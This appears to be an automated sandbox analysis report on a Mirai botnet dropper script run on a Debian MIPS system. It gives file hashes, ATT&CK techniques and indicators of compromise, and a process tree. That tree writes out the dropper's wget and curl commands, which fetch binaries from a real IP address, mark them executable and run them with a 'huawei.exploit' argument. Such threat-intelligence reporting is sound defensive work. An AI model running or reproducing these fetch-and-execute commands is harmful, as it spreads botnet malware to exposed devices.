mirai | 81a013dd15f6f42dc9b2f72ebfc7b5ecbc3be11b6e7777618bc500fa910102f3

Analysis

max time kernel
122s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
17-10-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

R0I24_na.sh
Size

4KB
MD5

d97f217a1dad90ac2a811c2684010888
SHA1

7aedac430643630d8d80e361279e85bf4a583679
SHA256

81a013dd15f6f42dc9b2f72ebfc7b5ecbc3be11b6e7777618bc500fa910102f3
SHA512

a98fe8d2822b641beaa27829c6e393974f666bdc502e459ed0e4e27f1213178fe92938960edcf81d4bcc30f7c0aec157dc353f34fb2652bff4c6a75996ac337f
SSDEEP

96:vNVjkNw4tNx/oNN7sNdMdEpF7Nn9qNUsBN2mnNRf4N3tiNueXNySjNGWvNPl9:GO4Fk

Score

10^/10

mirai unstable botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (149143) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
731	chmod
751	chmod
808	chmod
834	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/load.sh	732	load.sh
/tmp/load.sh	752	load.sh
/tmp/load.sh	809	load.sh
/tmp/load.sh	835	load.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	load.sh
File opened for modification	/dev/watchdog	load.sh

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	load.sh
File opened for modification	/bin/watchdog	load.sh

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-4.dat	upx
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	a	809	load.sh

Reads runtime system information 25 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/660/cmdline	load.sh
File opened for reading	/proc/699/cmdline	load.sh
File opened for reading	/proc/812/cmdline	load.sh
File opened for reading	/proc/815/cmdline	load.sh
File opened for reading	/proc/838/cmdline	load.sh
File opened for reading	/proc/678/cmdline	load.sh
File opened for reading	/proc/700/cmdline	load.sh
File opened for reading	/proc/813/cmdline	load.sh
File opened for reading	/proc/837/cmdline	load.sh
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	load.sh
File opened for reading	/proc/669/cmdline	load.sh
File opened for reading	/proc/692/cmdline	load.sh
File opened for reading	/proc/697/cmdline	load.sh
File opened for reading	/proc/816/cmdline	load.sh
File opened for reading	/proc/698/cmdline	load.sh
File opened for reading	/proc/704/cmdline	load.sh
File opened for reading	/proc/814/cmdline	load.sh
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/421/cmdline	load.sh
File opened for reading	/proc/657/cmdline	load.sh
File opened for reading	/proc/670/cmdline	load.sh
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
734	wget
735	curl
749	cat

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	curl
File opened for modification	/tmp/load.sh	R0I24_na.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	wget

/tmp/R0I24_na.sh
/tmp/R0I24_na.sh
1⤵
- Writes file to tmp directory
PID:700
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:702
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:729
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:730
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-heDop1
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/load.sh
  ./load.sh huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:732
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:749
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-heDop1
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/load.sh
  ./load.sh huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:752
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:755
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:786
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:806
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-heDop1
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/load.sh
  ./load.sh huawei.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  - Reads runtime system information
  PID:809
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Writes file to tmp directory
  PID:816
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:832
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:833
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/load.sh
  ./load.sh huawei.exploit
  2⤵
  - Executes dropped EXE
  PID:835
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Writes file to tmp directory
  PID:837
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:838

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
33KB

MD5
6d1b6e91b1e2037fbf62ca7ddcf04932

SHA1
d0769095ec2e678074eb206b3537022129c1a776

SHA256
7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

SHA512
7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

Download Submit
/tmp/load.sh

Filesize
35KB

MD5
fd5d7deebbb62aee931a1701a1042450

SHA1
4adc94ce9de13647815a16d6514b73e109c80785

SHA256
7a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9

SHA512
cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4

Download Submit
/tmp/load.sh

Filesize
37KB

MD5
144cc0c6dfb6f6e395065b02825a9ad1

SHA1
dfe5d7d8bef4511b42be1ae0235f7469d97bf789

SHA256
117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2

SHA512
9e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5

Download Submit
/tmp/load.sh

Filesize
34KB

MD5
b478298246ee6d313f4f576d0f7ec4cd

SHA1
94d25c6d4cfb1e218120d378d14c8d5ab868363b

SHA256
ed04f35cc6c4bef7ea8bf398436da916ebfab2490c10bd1d59df70f648e80df5

SHA512
83f67116e5c7074dcfa0e98d94697a0db2bdcaed15060aa31ed6a20eb543fd1d10d8fe26856178f78cc7402531de358e4b6c1d294086b18ab891d23954e78307

Download Submit